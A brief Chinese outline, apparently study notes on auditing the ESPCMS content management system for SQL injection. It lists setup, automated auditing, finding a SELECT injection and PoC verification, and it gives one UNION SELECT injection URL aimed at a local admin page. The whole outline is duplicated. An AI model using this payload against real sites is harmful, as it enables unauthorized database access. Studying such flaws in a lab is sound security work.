1. CMS环境搭建(espcms)
2. 自动化审计工具
3. 直接挖掘select 注入
4. 漏洞验证POC
针对 url 测试:http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,user(),4,5
1. CMS环境搭建(espcms)
2. 自动化审计工具
3. 直接挖掘select 注入
4. 漏洞验证POC
针对 url 测试:http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,user(),4,5